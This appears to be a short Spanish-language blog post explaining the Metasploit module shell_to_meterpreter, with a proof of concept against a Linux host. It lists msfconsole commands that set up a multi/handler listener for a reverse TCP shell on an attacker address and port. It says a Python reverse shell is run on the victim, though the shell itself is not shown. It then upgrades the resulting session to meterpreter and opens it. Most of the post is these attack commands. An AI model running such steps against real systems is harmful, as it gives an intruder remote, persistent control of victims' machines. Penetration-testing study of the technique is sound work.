Definición:
Este módulo intenta actualizar un shell de comandos a meterpreter. La plataforma shell se detecta automáticamente y se selecciona la mejor versión de meterpreter para el destino. Actualmente "meterpreter/reverse_tcp" se usa en Windows y Linux, y "python/meterpreter/reverse_tcp" usado en todos los demás.PoC:
En esta prueba de concepto se vulnerará un cliente Linux haciendo uso de una shell reversa escrita en Python, el objetivo es hacer el upgrade de esa shell a meterpreter.Iniciamos metasploit, y configuramos un listener.
msfconsole
use multi/handler
set payload linux/x64/shell/reverse_tcp
set LHOST 192.168.1.10
set LPORT 8080
exploit -j
En el equipo víctima ejecutamos cualquier reverse shell, en este caso usaré una hecha en python:
Una vez nos haya establecido una sesión, la upgradearemos con el siguiente módulo llamado "shell_to_meterpreter":
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION <session-id>
run
Una vez finalizado el exploit ya podremos acceder a la sesión meterpreter que se ha creado.
sessions -i <session-id>
0 comentarios: